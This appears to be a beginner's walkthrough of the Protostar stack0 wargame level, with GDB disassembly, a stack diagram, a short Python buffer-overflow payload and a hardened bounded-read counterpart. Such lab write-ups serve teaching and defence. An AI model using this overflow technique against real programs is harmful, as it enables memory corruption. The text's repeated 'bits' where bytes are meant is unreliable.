Hello Guyz,
In this post, I am going to show you how we can win the protostar stack0 level. Basically, our main goal here is to understand how a program practically works, and how we can understand every concept very clearly.
Before starting this walkthrough, I want to highlight a few points.
- I'm not the creator of the protostar war game. I am just a player.
- Here, I am just providing you hints and references, so that if you feel stuck anywhere, you can take a look here.
- For a practical hint, check the YouTube video given below.
Source Code :

```c
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  modified = 0;
  gets(buffer);   /* unbounded read into a 64-byte stack buffer: this is the level's intended bug */

  if(modified != 0) {
      printf("you have changed the 'modified' variable\n");
  } else {
      printf("Try again?\n");
  }
}
```
Disassembly of the main function (using GDB)

[ The system has created space of 0x60 (96 in decimal) bits on the stack ]

```
[-------------------------------------code-------------------------------------]
   0x80483f5 <main+1>:  mov    ebp,esp                    <<=== save the base pointer onto the stack
   0x80483f7 <main+3>:  and    esp,0xfffffff0
   0x80483fa <main+6>:  sub    esp,0x60                   <<=== this instruction creates space of 96 bits on the stack
=> 0x80483fd <main+9>:  mov    DWORD PTR [esp+0x5c],0x0   <<=== this instruction writes 0 into bits 92-96 (modified = 0)
   0x8048405 <main+17>: lea    eax,[esp+0x1c]             <<=== this instruction copies the address 28 bits from the start
                                                                of the 96 into EAX; from there it is moved to the stack
                                                                so that it works as the argument for the gets call
   0x8048409 <main+21>: mov    DWORD PTR [esp],eax        <<=== copy EAX onto the stack
   0x804840c <main+24>: call   0x804830c <gets@plt>       <<=== perform the gets call
   0x8048411 <main+29>: mov    eax,DWORD PTR [esp+0x5c]   <<=== get the value of bits 92-96 and move it to EAX
```
Situation on the stack

```
  0                28                                            92         96
  ==============================================================================
  | Other things   | Buffer (64)                                 | modified |
  ==============================================================================
                   ^                                             ^
                   |                                             |
                   gets overwrites from here                     target area
```
Exploit

```python
#!/usr/bin/python
# Total size of the buffer on the stack: 0x60
# 0x80483fa <main+6>:   sub esp,0x60                  ==> 96 in decimal
# 0x8048405 <main+17>:  lea eax,[esp+0x1c]            ==> buffer starts at esp+0x1c
# 0x804840c <main+24>:  call 0x804830c <gets@plt>
# 0x80483fd <main+9>:   mov DWORD PTR [esp+0x5c],0x0  ==> modified lives at esp+0x5c

payload = 'a' * 64   # buffer variable value (0x5c - 0x1c = 64 bytes)
payload += 'b' * 4   # modified variable value (the 4 bytes right after the buffer)

# usage: python exploit.py > tmp ; ./bin/stack0 < tmp
print(payload)
```
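As a defensive counterpart, here is the same frame with `gets()` swapped for a length-capped reader. This is an added example written for this post, not protostar's own source; `bounded_getline` and `stack0_hardened` are names I chose, and the reader mirrors `fgets()` semantics so the 64+4 byte payload above can no longer reach `modified`.

```c
#include <stdio.h>
#include <string.h>

/* Same locals as stack0's main(), but the unbounded gets() is replaced
 * by a reader capped at sizeof buffer. With gets(), 64 bytes of 'a'
 * fill buffer (esp+0x1c .. esp+0x5b) and the next 4 bytes land on
 * modified (esp+0x5c). With the cap, byte 64 onward is dropped. */

/* fgets()-style: copy at most cap-1 bytes of input into buf, stop after
 * a newline, always NUL-terminate. Returns how many input bytes of the
 * line were discarded because they did not fit. */
size_t bounded_getline(const char *input, char *buf, size_t cap)
{
    size_t n = 0, dropped = 0;
    if (cap == 0)
        return 0;
    while (*input != '\0') {
        char c = *input++;
        if (n < cap - 1)
            buf[n++] = c;       /* fits: store it */
        else
            dropped++;          /* would overflow: drain instead of write */
        if (c == '\n')
            break;              /* end of line, like gets()/fgets() */
    }
    buf[n] = '\0';
    return dropped;
}

/* Hardened stack0 body. Returns modified after the read: always 0,
 * because no input length can write past buffer[63]. */
int stack0_hardened(const char *input)
{
    volatile int modified = 0;
    char buffer[64];

    bounded_getline(input, buffer, sizeof buffer);

    if (modified != 0)
        puts("you have changed the 'modified' variable");
    else
        puts("Try again?");
    return modified;
}
```

Feeding the 64x'a' + 4x'b' line into `stack0_hardened` keeps the first 63 bytes and discards the remaining 6 (the 64th 'a', the four 'b's and the newline), so the program always prints "Try again?".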
For a more detailed walkthrough, check the YouTube video playlist provided below.